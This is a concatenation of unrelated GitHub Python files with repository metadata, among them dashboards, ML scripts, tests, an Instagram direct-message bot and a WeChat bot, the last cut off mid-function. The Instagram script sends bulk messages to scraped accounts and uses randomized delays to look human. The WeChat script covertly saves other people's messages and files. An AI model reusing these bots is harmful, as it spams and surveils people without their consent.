\n\n#-------------------------- Start of the script's logical structure ------------------------\n#---------------------------------------------------------------------------------------\n# loading the dataset\ndf = pd.read_csv( 'dataset/train.csv' )\n\ndf1 = clean_code( df )\n\n\n# Company view\n# ==========================================================================\n# Sidebar\n# ==========================================================================\nst.header( 'Marketplace - Visão Cliente' )\n\n#image_path = '/Users/eliom/Documents/repos/ftc_ds/cury.jpg'\nimage = Image.open( 'cury.jpg' )\nst.sidebar.image( image, width=120 )\n\nst.sidebar.markdown( '# Cury Company' )\nst.sidebar.markdown( '## Fastest Delivery in Town' )\nst.sidebar.markdown( \"\"\"___\"\"\" )\n\nst.sidebar.markdown( '## Selecione uma data limite ' )\n\nimport datetime\n\n# a plain datetime is simpler than round-tripping through a pandas Timestamp\ndate_datetime = datetime.datetime(2022, 4, 13)\n\ndate_slider = st.sidebar.slider(\n    \"Até qual valor?\",\n    value=date_datetime,\n    min_value=datetime.datetime(2022, 2, 11),\n    max_value=datetime.datetime(2022, 4, 13),  # must be >= the default value\n    format='YYYY-MM-DD'\n)\n\nst.sidebar.markdown( \"\"\"___\"\"\" )\n\n\ntraffic_options = st.sidebar.multiselect(\n    'Quais as condições do trânsito',\n    ['Low', 'Medium', 'High', 'Jam'],\n    default=['Low', 'Medium', 'High', 'Jam'] )\n\nst.sidebar.markdown( \"\"\"___\"\"\" )\nst.sidebar.markdown( '### Powered by Comunidade DS' )\n\n# Date filter \nlinhas_selecionadas = df1['Order_Date'] < date_slider\ndf1 = df1.loc[linhas_selecionadas, :]\n\n# Traffic filter \nlinhas_selecionadas = df1['Road_traffic_density'].isin( traffic_options )\ndf1 = df1.loc[linhas_selecionadas, :]\n# ==========================================================================\n# Streamlit layout\n# ==========================================================================\ntab1, tab2, tab3 = st.tabs( ['Visão Gerencial', 'Visão Tática', 'Visão Geográfica'] )\n\nwith tab1:\n    with st.container():\n        # Order Metric\n        fig = order_metric( df1 )\n        st.markdown( '# Orders By Day' )\n        st.plotly_chart(fig, use_container_width=True )\n        \n        \n        \n    with st.container():\n        col1, col2 = st.columns( 2 )\n        \n        with col1:\n            fig = traffic_order_share( df1 )\n            st.header( \"Traffic Order Share\" )\n            st.plotly_chart(fig, use_container_width=True )\n            \n            \n        with col2:\n            st.header( \"Traffic Order City\" )\n            fig = traffic_order_city( df1 )\n            st.plotly_chart( fig, use_container_width=True )\n\n        \n        \nwith tab2:\n    with st.container():\n        st.markdown(\"# Order By Week\" )\n        fig = order_by_week( df1 )\n        st.plotly_chart(fig, use_container_width=True )\n    \n    with st.container():\n        st.markdown(\"# Order Share by Week\" )\n        fig = order_share_by_week( df1 )\n        st.plotly_chart(fig, use_container_width=True )\n    \n\nwith tab3:\n    st.markdown( \"# Country Maps\" )\n    country_maps( df1 )\n    \n    \n\n","repo_name":"Eliomatheus/curry_company","sub_path":"pages/1_visao_empresa.py","file_name":"1_visao_empresa.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38891697892","text":"import pytz\nimport geopandas as gpd\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.pyplot as 
plt\n\nfilename = \"./tz_world/tz_world.shp\"\n\nif __name__ == \"__main__\":\n\n print(\"Read shapefile %s...\" % filename)\n polys = gpd.read_file(filename)\n\n print(\"Print polygons....\")\n print(polys)\n\n print(\"Create point...\")\n p = Point(1.4488911764032935, 43.604560049363485)\n print(p)\n\n print(\"Put point in a geodataframe...\")\n d = {'col1': ['Toulouse'], 'geometry': [p]}\n gdf = gpd.GeoDataFrame(d, crs=\"EPSG:4326\")\n\n print(\"Display shapefile and point...\")\n fig, ax = plt.subplots()\n polys.plot(ax=ax, facecolor='gray');\n gdf.plot(ax=ax, facecolor='red');\n plt.show()\n","repo_name":"remidebord/Local-Time-Grid-Generator","sub_path":"plot-shapefile-with-point.py","file_name":"plot-shapefile-with-point.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3488164045","text":"import os\nimport random\nimport json\nimport logging\n\nimport numpy as np\n\nimport torch\nfrom sklearn.metrics import f1_score\n\n# custom imports\n\nfrom models.dqn import DQNModel\nfrom utils.misc import parse_arguments, set_logger\nfrom utils.io import load_dqn_model\n\nimport utils.constants as cts\nfrom dataset.custom_feat_extractor import CustomFeatExtractor\nfrom dataset.custom_dataset import TestDataset\n\nnp.random.seed(42)\nrandom.seed(42)\ntorch.set_printoptions(precision=4, sci_mode=False)\n\n\nclass TestAgent():\n\n def __init__(self, args):\n\n self.args = args\n\n self.test_dataset = TestDataset(args)\n self.configs = self.test_dataset.configs\n self.n_configs = len(self.configs)\n\n self.model = DQNModel(\n n_actions=self.n_configs, dataset=args.dataset).to(cts.DEVICE)\n\n self.feat_extractor = CustomFeatExtractor(args, self.configs)\n\n model_path = os.path.join(\n cts.DATA_DIR,\n cts.RL_MODEL_ROOT,\n args.class_name)\n if not os.path.exists(model_path):\n logging.info(\"Model folder %s does not exist\")\n exit(0)\n\n self.model = load_dqn_model(\n self.model, model_path, cts.DEVICE)\n\n self.model.eval()\n\n def test_agent_with_raw_images(self):\n\n self.model.eval()\n test_time = 0\n preds = []\n gts = []\n configs = []\n init_config = len(self.test_dataset.configs)-1\n\n self.test_dataset.reset()\n\n state, gt = self.test_dataset.get_state(init_config)\n obs, pred, udf_time = self.feat_extractor.get_observation_from_state(\n state)\n test_time += udf_time\n preds.append(pred)\n gts.append(gt)\n configs.append(init_config)\n while obs is not None:\n obs = obs.to(cts.DEVICE)\n q_value = self.model(obs)\n if cts.USE_CUDA:\n torch.cuda.synchronize()\n config = q_value.argmax(\n 1).data.cpu().numpy().astype(int)[0]\n\n state, gt = self.test_dataset.get_state(config)\n if state is None:\n obs = None\n continue\n obs, pred, udf_time = \\\n self.feat_extractor.get_observation_from_state(state)\n\n test_time += udf_time\n preds.append(pred)\n gts.append(gt)\n configs.append(config)\n\n test_f1 = f1_score(gts, preds)\n logging.info(\"Total execution time: %.2f\", test_time)\n logging.info(\"Total frames: %d\", self.test_dataset.total_frames)\n logging.info(\"Test F1 score: %.2f\", test_f1*100)\n logging.info(\"FPS: %.2f\", self.test_dataset.total_frames/test_time)\n logging.info(\"Config dist: %s\", np.unique(configs, return_counts=True))\n\n\nif __name__ == \"__main__\":\n\n args = parse_arguments()\n\n args.result_path = os.path.join(\n cts.DATA_DIR,\n 'results',\n args.class_name)\n if not os.path.exists(args.result_path):\n os.makedirs(args.result_path)\n log_file = 
os.path.join(args.result_path,\n 'test_results.log')\n set_logger(log_file=log_file)\n\n logging.info(\"Start execution\")\n logging.info(\"main:: Start execution with args:\\n %s\",\n json.dumps(vars(args), indent=4))\n\n agent = TestAgent(args)\n\n agent.test_agent_with_raw_images()\n","repo_name":"georgia-tech-db/zeus","sub_path":"src/rl-inference-engine/rl-agent.py","file_name":"rl-agent.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"4601603462","text":"from typing import Any\nfrom gspread.models import Spreadsheet\nfrom cli import parse_commandline_args\nfrom config import Configuration\nfrom datetime import datetime\nimport gspread\nimport csv\nfrom google.oauth2.service_account import Credentials\nfrom stopwatch import Stopwatch\n\n# e.g. python main.py --importfile ./data/example.csv --credentials ./.local/secret.json --share example@gmail.com --title Sample\ndef main():\n \"\"\" Main Process\n\n Args:\n none\n Returns:\n code (int): exit status code.\n \"\"\"\n stopwatch = Stopwatch()\n stopwatch.start()\n\n args = parse_commandline_args()\n\n # create sheet title\n titlePrefix = args.title\n if not (args.title):\n titlePrefix = \"NewReport\"\n now = datetime.now()\n title = titlePrefix + '_' + str(now.year) + str(now.month).zfill(2) + str(now.day).zfill(2) + str(now.hour).zfill(2) + str(now.minute).zfill(2) + str(now.second).zfill(2)\n\n # load configuraion\n config = Configuration()\n\n # create sheet\n scopes = [\n 'https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive'\n ]\n\n try:\n credentials = Credentials.from_service_account_file(args.credentials, scopes=scopes)\n gc = gspread.authorize(credentials)\n sheet = gc.create(title)\n \n # share user\n sheet.share(args.share, perm_type='user', role='owner')\n\n # update worksheet\n wk = sheet.sheet1\n wk.update_title('Result')\n\n # input worksheet\n with open(file=args.importfile, mode=\"r\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f, delimiter=\",\", doublequote=False, lineterminator=\"\\r\")\n\n # update worksheet\n wk.add_rows(len(reader.fieldnames) + config.row_buffer)\n wk.add_cols(config.column_buffer)\n \n # set header\n headers = wk.range(1, 1, 1, len(reader.fieldnames))\n for i in range(len(reader.fieldnames)):\n headers[i].value = reader.fieldnames[i]\n wk.update_cells(headers)\n\n # set value\n fileds = reader.fieldnames\n v_row_count = 2\n total_cells = []\n for row in reader:\n cells = wk.range(v_row_count, 1, v_row_count, len(fileds))\n for i in range(len(fileds)):\n cells[i].value = row[fileds[i]]\n total_cells.extend(cells)\n v_row_count += 1\n wk.update_cells(total_cells)\n\n except:\n raise\n\n finally:\n stopwatch.stop()\n info(sheet)\n \n print(f'Complete🎉 : time = {stopwatch.duration}')\n return 0\n\ndef info(sheet: Spreadsheet):\n \"\"\" Show information.\n\n Args:\n sheet (Spreadsheet)\n Returns:\n void\n \"\"\"\n\n print()\n print('##### SpredSheet Info #####')\n print(f'* ID : {sheet.id}')\n print(f'* URL : {sheet.url}')\n print()\n\nif __name__ == \"__main__\":\n main()","repo_name":"atEaE-tried/python-to-spread","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21695082120","text":"import pandas as pd\n\ndef eliminar_columnas(csv_entrada, columnas_eliminar, csv_salida):\n # Cargar el archivo CSV de entrada 
en un DataFrame\n df = pd.read_csv(csv_entrada)\n\n # Eliminar las columnas no utilizadas\n df = df.drop(columnas_eliminar, axis=1)\n\n # Guardar el DataFrame resultante en un nuevo archivo CSV\n df.to_csv(csv_salida, index=False)\n\n# Ejemplo de uso\ncsv_entrada = 'diputados_modificado.csv'\ncsv_salida = 'votos.csv'\ncolumnas_eliminar = ['NUM_BOLETAS_EXTRAIDAS','CAND_IND_2','DISTRITO', 'SECCION','ID_CASILLA','TIPO_CASILLA','EXT_CONTIGUA','UBICACION_CASILLA','TIPO_ACTA','NUM_BOLETAS_SOBRANTES','TOTAL_CIUDADANOS_VOTARON','C_PRI_PVEM','C_PRD_PT','CAND_IND_1','NO_REGISTRADOS','TOTAL_VOTOS','LISTA_NOMINAL','OBSERVACIONES','CONTABILIZADA'] # Lista de columnas a eliminar\n\neliminar_columnas(csv_entrada, columnas_eliminar, csv_salida)\n","repo_name":"PVega17102/AI_Elections","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10606815950","text":"fruits=['apple','banana','grape']\nfruits.append('orange')\nfruits.insert(1,'pear')\ndel fruits[fruits.index('grape')]\nprint(fruits)\nlst1=[0.5,1.6,8.5,6.4,7.2,5,3.6,5.5,4.1,10]\ndel lst1[lst1.index(max(lst1))]\ndel lst1[lst1.index(min(lst1))]\nprint(sum(lst1)/len(lst1))\nfrom math import pi\nprint(\"{hehe} is {hehe}\".format(hehe='nmsl'))\nprint(\"{0:.2f}\".format(pi))","repo_name":"HCHogan/Rough-Period","sub_path":"例题/PY/垃圾堆/temp01.py","file_name":"temp01.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"25719082710","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport sfml as sf\n\nclass Application :\n _instance = None\n\n @classmethod\n def instance(klass) :\n if klass._instance == None :\n klass._instance = Application()\n return klass._instance\n\n def __init__(self):\n self.state = None\n self.window = None\n\n f = open(\"config.json\")\n self.config = json.load(f)\n f.close()\n\n def pre_load(self) :\n self.window = sf.RenderWindow(sf.VideoMode(800, 600), \"Input Test\")\n \n self.window.framerate_limit = 60\n self.window.key_repeat_enabled = False\n\n self.window.clear(sf.Color(0, 0, 0))\n self.window.display()\n\n def input(self, frame) :\n for event in self.window.events :\n if type(event) == sf.CloseEvent :\n self.window.close()\n break\n\n elif type(event) == sf.KeyEvent :\n self.state.input(frame, event)\n\n def update(self, frame) :\n self.state.update(frame)\n\n def draw(self, frame) :\n self.window.clear(sf.Color(0, 0, 0))\n self.state.draw(frame, self.window)\n self.window.display()\n\n def run(self) :\n self.pre_load()\n\n self.state = FightState()\n\n clock = sf.Clock();\n offset = clock.elapsed_time.seconds - int(clock.elapsed_time.seconds)\n\n last_frame = -1\n\n while self.window.is_open :\n frame = int((clock.elapsed_time.seconds - offset) / (1.0 / 60.0))\n\n self.input(frame)\n\n if frame != last_frame :\n self.update(frame)\n self.draw(frame)\n \n last_frame = frame\n \n f = open(\"log\", \"w+\")\n json.dump(self.state.p1.controller.buffer, f, indent=True)\n f.close()\n\nfrom FightState import *\n","repo_name":"Rafagd/luta","sub_path":"Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22977916038","text":"'''mutable.py\nThe difference between mutable and immutable types\n'''\n\n# A list is a mutable type\na = [1,2,3,4]\n\n# I can use 
the variable assignment notation to change the value of one element in the list\na[0] = 100\n\n# We can also use insert() method to change the value of list `a`\na.insert(3, 200)\n\na.sort()\n\n# String is an immutable type\ns = 'hello world'\n# s[0] = 'm'\ns = s.replace('world', 'Mars')\nprint(s)\n\n'''\nReview:\n\nMutable types: list, dictionary, set, user defined objects\nImmutable types: integer, float, long, complex, string, tuple\n'''\n\n","repo_name":"sdotpeng/Python_Jan_Plan","sub_path":"Feb_7/mutable.py","file_name":"mutable.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28252667280","text":"import npyscreen\n\nfrom utils.Forms import (\n Search, \n displayfeed,\n displaydetailed,\n downloading,\n playing \n)\n\nclass App(npyscreen.NPSAppManaged):\n def onStart(self):\n self.addForm('MAIN', Search, name='Search')\n self.addForm('display',displayfeed, name= \"SEARCH RESULTS\")\n self.addForm('detailed',displaydetailed, name = \" \")\n self.addForm('downloading',downloading,name = \" DOWNLOAD STATUS\")\n self.addForm('playing',playing, name = \" Playing video\")\n\n \n\n\nif __name__ == '__main__':\n Apprun = App().run() \n","repo_name":"victorphoenix3/youtube-downloader","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12983328728","text":"from selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom webdriver_manager.chrome import ChromeDriverManager as Cm\nfrom selenium import webdriver\nfrom configparser import ConfigParser\nimport sqlite3\nimport time\nimport random\nfrom run import scrape\n\nTIMEOUT = 60\n\nprint(\"\"\"\n \n __ .__ __. _______.___________. ___ _______ .______ ___ .___ ___. \n| | | \\ | | / | | / \\ / _____|| _ \\ / \\ | \\/ | \n| | | \\| | | (----`---| |----` / ^ \\ | | __ | |_) | / ^ \\ | \\ / | \n| | | . 
` | \\ \\ | | / /_\\ \\ | | |_ | | / / /_\\ \\ | |\\/| | \n| | | |\\ | .----) | | | / _____ \\ | |__| | | |\\ \\----./ _____ \\ | | | | \n|__| |__| \\__| |_______/ |__| /__/ \\__\\ \\______| | _| `._____/__/ \\__\\ |__| |__| \n \n \n\"\"\")\n\n\ndef read_users():\n con = sqlite3.connect('database.db')\n curs = con.execute('SELECT name FROM accounts where sent = 0')\n rows = curs.fetchall()\n users = []\n for row in rows:\n users.append(row[0])\n return users\n\n\nconfig_object = ConfigParser()\n\nconfig_object.read(\"confg.ini\")\n\n# Get the password\n\nuserinfo = config_object[\"USERINFO\"]\nUSERNAME = format(userinfo[\"put your Email or username\"])\nPASSWORD = format(userinfo[\"put your Password here\"])\nmessage = format(userinfo[\"put your Message here\"])\nprint(\"login..........\")\noptions = webdriver.ChromeOptions()\noptions.add_argument('--no-sandbox')\noptions.add_argument(\"--log-level=3\")\nmobile_emulation = {\n \"userAgent\": \"Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/90.0.1025.166 Mobile Safari/535.19\"}\noptions.add_experimental_option(\"mobileEmulation\", mobile_emulation)\n\nbot = webdriver.Chrome(executable_path=Cm().install(), options=options)\n\n\ndef login():\n bot.get('https://www.instagram.com/accounts/login/')\n\n time.sleep(2)\n\n print(\"[Info] - Logging in...\")\n\n user_element = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"loginForm\"]/div[1]/div[3]/div/label/input')))\n\n user_element.send_keys(USERNAME)\n\n pass_element = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"loginForm\"]/div[1]/div[4]/div/label/input')))\n\n pass_element.send_keys(PASSWORD)\n\n login_button = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"loginForm\"]/div[1]/div[6]/button')))\n\n time.sleep(0.4)\n\n login_button.click()\n\n time.sleep(3)\n for user in read_users():\n try:\n bot.get('https://www.instagram.com/')\n bot.get('https://www.instagram.com/direct/new/')\n time.sleep(random.uniform(2, 4))\n input_field = bot.find_element_by_class_name(\"j_2Hd\")\n for ch in user:\n input_field.send_keys(ch)\n time.sleep(0.2)\n print(\"here1\")\n time.sleep(2)\n buton_valid = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.CLASS_NAME, '-qQT3')))\n buton_valid.click()\n print(\"here2\")\n time.sleep(2)\n buton_next = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.CLASS_NAME, 'sqdOP')))\n\n buton_next.click()\n input_field = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"react-root\"]/section/div[2]/div/div/div[2]/div/div/div/textarea')))\n time.sleep(random.uniform(5, 10))\n print(\"[info...] 
type the input now \")\n for ch in message:\n input_field.send_keys(ch)\n time.sleep(0.2)\n time.sleep(random.uniform(5, 10))\n button_send = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"react-root\"]/section/div[2]/div/div/div[2]/div/div/div[2]/button')))\n button_send.click()\n con = sqlite3.connect('database.db')\n curs = con.execute('SELECT name FROM accounts')\n sql_update_query = f\"\"\"Update accounts set sent = 1 where name = '{user}'\"\"\"\n curs.execute(sql_update_query)\n con.commit()\n print(\"Record Updated successfully \")\n curs.close()\n time.sleep(random.uniform(10, 30))\n except NoSuchElementException:\n print(\"error\")\n pass\n\n\nif __name__ == '__main__':\n scrape()\n login()\n","repo_name":"ismailelghazi/bots-telegram-instagram","sub_path":"instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39398714380","text":"import unittest\nfrom unittest import mock\n\nfrom google.cloud.datacatalog import types\n\nfrom datacatalog_tag_exporter import datacatalog_facade\n\n\nclass DataCatalogFacadeTest(unittest.TestCase):\n\n @mock.patch('datacatalog_tag_exporter.datacatalog_facade.datacatalog.DataCatalogClient')\n def setUp(self, mock_datacatalog_client):\n self.__datacatalog_facade = datacatalog_facade.DataCatalogFacade()\n # Shortcut for the object assigned to self.__datacatalog_facade.__datacatalog\n self.__datacatalog_client = mock_datacatalog_client.return_value\n\n def test_constructor_should_set_instance_attributes(self):\n self.assertIsNotNone(self.__datacatalog_facade.__dict__['_DataCatalogFacade__datacatalog'])\n\n def test_get_tag_template_should_call_client_library_method(self):\n self.__datacatalog_facade.get_tag_template(None)\n\n datacatalog = self.__datacatalog_client\n datacatalog.get_tag_template.assert_called_once()\n\n def test_search_tag_templates_should_return_values(self):\n result_iterator = MockedObject()\n\n entry = MockedObject()\n entry.name = 'template_1'\n\n entry_2 = MockedObject()\n entry_2.name = 'template_2'\n\n expected_return_value = [entry, entry_2]\n\n # simulates two pages\n result_iterator.pages = [[entry], [entry_2]]\n\n datacatalog = self.__datacatalog_client\n datacatalog.search_catalog.return_value = result_iterator\n\n return_value = self.__datacatalog_facade.search_tag_templates('my-project1,my-project2')\n\n self.assertEqual(1, datacatalog.search_catalog.call_count)\n self.assertEqual(expected_return_value, return_value)\n\n def test_search_tagged_assets_should_return_values(self):\n result_iterator = MockedObject()\n\n entry = MockedObject()\n entry.name = 'asset_1'\n\n entry_2 = MockedObject()\n entry_2.name = 'asset_2'\n\n expected_return_value = [entry, entry_2]\n\n # simulates two pages\n result_iterator.pages = [[entry], [entry_2]]\n\n datacatalog = self.__datacatalog_client\n datacatalog.search_catalog.return_value = result_iterator\n\n return_value = self.__datacatalog_facade.search_tagged_assets('my-project1', 'template1')\n\n self.assertEqual(1, datacatalog.search_catalog.call_count)\n self.assertEqual(expected_return_value, return_value)\n\n def test_search_tagged_assets_with_date_created_should_return_values(self):\n result_iterator = MockedObject()\n\n entry = MockedObject()\n entry.name = 'asset_1'\n\n entry_2 = MockedObject()\n entry_2.name = 'asset_2'\n\n expected_return_value = [entry, entry_2]\n\n # simulates two pages\n 
result_iterator.pages = [[entry], [entry_2]]\n\n datacatalog = self.__datacatalog_client\n datacatalog.search_catalog.return_value = result_iterator\n\n return_value = self.__datacatalog_facade.search_tagged_assets(\n 'my-project1', 'template1', '2020-01-01')\n\n self.assertEqual(1, datacatalog.search_catalog.call_count)\n self.assertEqual(expected_return_value, return_value)\n\n def test_extract_resources_from_template_should_return_values(self):\n resource_name = 'projects/my-project/locations/us-central1/tagTemplates/my-template'\n\n project_id, location_id, tag_template_id = \\\n self.__datacatalog_facade.extract_resources_from_template(resource_name)\n\n self.assertEqual('my-project', project_id)\n self.assertEqual('us-central1', location_id)\n self.assertEqual('my-template', tag_template_id)\n\n\nclass MockedObject(object):\n\n def __setitem__(self, key, value):\n self.__dict__[key] = value\n\n def __getitem__(self, key):\n return self.__dict__[key]\n\n\ndef make_fake_tag():\n tag = types.Tag()\n tag.template = 'test_template'\n tag.fields['test_bool_field'].bool_value = True\n tag.fields['test_double_field'].double_value = 1\n tag.fields['test_string_field'].string_value = 'Test String Value'\n tag.fields['test_timestamp_field'].timestamp_value.FromJsonString('2019-10-15T01:00:00-03:00')\n tag.fields['test_enum_field'].enum_value.display_name = 'Test ENUM Value'\n\n return tag\n","repo_name":"mesmacosta/datacatalog-tag-exporter","sub_path":"tests/datacatalog_tag_exporter/datacatalog_facade_test.py","file_name":"datacatalog_facade_test.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73059782170","text":"from sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nimport pandas as pd\nimport pickle\n\ndf=pd.read_csv(\"bin/7/games12:15.csv\",header=0, sep=';')\ny = df.pop('win')\ndf.pop('home_odd')\ndf.pop('visitor_odd')\nX = df\nmean = 0\nnb_repetition = 10\nfor i in range(0,nb_repetition):\n # Split dataset into training set and test set\n X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.02)\n #Create a Gaussian Classifier\n gnb = GaussianNB()\n\n #Train the model using the training sets\n gnb.fit(X_train, y_train)\n\n #Predict the response for test dataset\n y_pred = gnb.predict(X_test)\n pickle.dump(gnb, open('model/8/naive_bayes.model', 'wb'))\n\n print(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n mean += metrics.accuracy_score(y_test, y_pred)\nprint('mean accuracy: ', mean/nb_repetition)","repo_name":"corentinbranchereau/NBA-predictions","sub_path":"src/model_training/naive_bayes_training.py","file_name":"naive_bayes_training.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"38164819450","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport requests\nimport itchat\nfrom itchat.content import *\nimport time\nfrom apscheduler.schedulers.background import BackgroundScheduler\nimport re\nimport json\n\nKEY = 'xxx'\n\n\ndef get_response(msg):\n apiUrl = 'http://www.tuling123.com/openapi/api'\n data = {\n 'key': KEY,\n 'info': msg,\n 'userid': 'wechat-robot',\n }\n try:\n r = requests.post(apiUrl, data=data).json()\n return r.get('text')\n except Exception as e:\n print(e)\n return\n\n\n# 文件临时存储页\nrec_tmp_dir = os.path.join(os.getcwd(), 'tmp/')\n\n# 
存储数据的字典\nrec_msg_dict = {}\n\nmsg_dict = {}\n\n\ndef after_login():\n print(\"登录后调用\")\n # 获取自己的用户信息,返回自己的属性字典\n # result = itchat.search_friends(name='龙淑宁')\n # print(result)\n # print(\"========================================================\")\n # 根据姓名��找用户\n # user_info = itchat.search_friends(name='高群翔')\n # print(user_info)\n # print(\"========================================================\")\n # if len(user_info) > 0:\n # # 拿到用户名\n # user_name = user_info[0]['UserName']\n # # 发送文字信息\n # itchat.send_msg('老铁你好啊! 我是机器人哦 一起来聊天吧 ', user_name)\n # content = get_weather()\n # itchat.send_msg(content, user_name)\n # # 发送图片\n # time.sleep(10)\n # itchat.send_image('data/c3e20e1e5e2af7948b5afa3a9443a455.jpg', user_name)\n # # 发送文件\n # time.sleep(10)\n # itchat.send_file('data/1552568575305.gif', user_name)\n # 发送视频\n # time.sleep(10)\n # itchat.send_video('sport.mp4', user_name)\n # time.sleep(5)\n # itchat.send(\"文件助手你好哦\", toUserName=\"filehelper\")\n print(\"========================================================\")\n # print(\"完整的群聊列表如下:\")\n # rooms = itchat.get_chatrooms()\n # print(rooms)\n # 通过群聊名查找\n # chat_rooms = itchat.search_chatrooms(name='飘啊飘')\n # if len(chat_rooms) > 0:\n # itchat.send_msg('我是Python脚本哦,大家好啊', chat_rooms[0]['UserName'])\n # 查找特定群聊\n # time.sleep(10)\n weather_schedule()\n # start_schedule()\n\n\ndef after_logout():\n print(\"退出后调用\")\n\n\n# 好友信息监听\n@itchat.msg_register([TEXT, PICTURE, RECORDING, ATTACHMENT, VIDEO], isFriendChat=True)\ndef handle_friend_msg(msg):\n msg_id = msg['MsgId']\n msg_from_user = msg['User']['NickName']\n msg_content = ''\n # 收到信息的时间\n msg_time_rec = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n msg_create_time = msg['CreateTime']\n msg_type = msg['Type']\n\n if msg['Type'] == 'Text':\n msg_content = msg['Content']\n elif msg['Type'] == 'Picture' \\\n or msg['Type'] == 'Recording' \\\n or msg['Type'] == 'Video' \\\n or msg['Type'] == 'Attachment':\n msg_content = r\"\" + msg['FileName']\n msg['Text'](rec_tmp_dir + msg['FileName'])\n rec_msg_dict.update({\n msg_id: {\n 'msg_from_user': msg_from_user,\n 'msg_time_rec': msg_time_rec,\n 'msg_create_time': msg_create_time,\n 'msg_type': msg_type,\n 'msg_content': msg_content\n }\n })\n print(\"who:\", msg_from_user, \"createTime:\", msg_create_time, \"recvTime:\", msg_time_rec, \"content:\", msg_type,\n msg_content)\n\n\n# 群聊信息监听\n@itchat.msg_register([TEXT, PICTURE, RECORDING, ATTACHMENT, VIDEO], isGroupChat=True)\ndef information(msg):\n msg_id = msg['MsgId']\n msg_from_user = msg['ActualNickName']\n msg_content = ''\n # 收到信息的时间\n msg_time_rec = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n msg_create_time = msg['CreateTime']\n msg_type = msg['Type']\n\n if msg['Type'] == 'Text':\n msg_content = msg['Content']\n elif msg['Type'] == 'Picture' \\\n or msg['Type'] == 'Recording' \\\n or msg['Type'] == 'Video' \\\n or msg['Type'] == 'Attachment':\n msg_content = r\"\" + msg['FileName']\n msg['Text'](rec_tmp_dir + msg['FileName'])\n rec_msg_dict.update({\n msg_id: {\n 'msg_from_user': msg_from_user,\n 'msg_time_rec': msg_time_rec,\n 'msg_create_time': msg_create_time,\n 'msg_type': msg_type,\n 'msg_content': msg_content\n }\n })\n print(\"who:\", msg_from_user, \"createTime:\", msg_create_time, \"recvTime:\", msg_time_rec, \"content:\", msg_type,\n msg_content)\n\n\n# 每隔五种分钟执行一次清理任务\ndef clear_cache():\n # 当前时间\n cur_time = time.time()\n # 遍历字典,如果有创建时间超过2分钟(120s)的记录,删除,非文本的话,连文件也删除\n for key in list(rec_msg_dict.keys()):\n if int(cur_time) - 
